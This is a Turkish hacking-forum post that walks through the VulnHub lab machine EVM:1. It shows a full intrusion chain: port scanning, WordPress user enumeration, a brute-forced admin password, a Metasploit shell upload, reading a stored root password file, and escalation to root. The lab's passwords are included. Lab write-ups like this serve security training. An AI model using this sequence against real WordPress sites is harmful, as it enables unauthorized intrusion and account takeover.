Selamlar Değerli TurkHackTeam Üyeleri ;
Bugün Sizlerle VulnHub da Bulunan EVM:1 Adlı Makineyi Çözeceğiz
Makine: LİNK
Önce nmap taraması yapalım,
nmap -A -p- -T4 ip
Ve nmap taramamız bitti,
80. portumuz açık sitemize gidelim.
Bizi defoult apache sayfası karşıladı, dirb aracı ile içindeki dizinleri bulalım
dirb http://ip/
Burada /wordpress adın da bir dizin var yani bir wp dizini hemen kullanıcısını bulalım.
wpscan --url http://ip/wordpress --enumerate u
Evet kullanıcı adımızı bulduk
Şimdi ise elimizde kullanıcı adı var şifre yok brute-force saldırısı ile şifreyi elde etmeye çalışalım.
wpscan --url http://ip/wordpress -U username -P wordlistiniz
Şifremizi buldu şifremiz 24992499 muş
Şimdi metasploit üzerinden shell sokmayı denicem
msfconsole -q
use exploit/unix/webapp/wp_admin_shell_upload
diyerek exploitimizi seçelim
Daha sonra exploitimizin ayarlarını yaptıktan sonra exploit diyerek bağlantı alalım,
ls dedikten sonra root3r adında dizin var oraya giriyorum
burada root için gerekli password txt dosyası var cat komutu ile okuyorum
cat .root_password_ssh.txt
shell diyerek shell oluşturuyorum ve
python -c 'import pty;pty.spawn("/bin/bash")'
komuyla www-data kullanıcısına ulaşıyorum
su root diyerek şifremi veriyorum willy26
daha sonra whoami dediğimde root kullanıcısı olduğumu görüyorum,
son olarak root dizininde dosyayı okuyorum.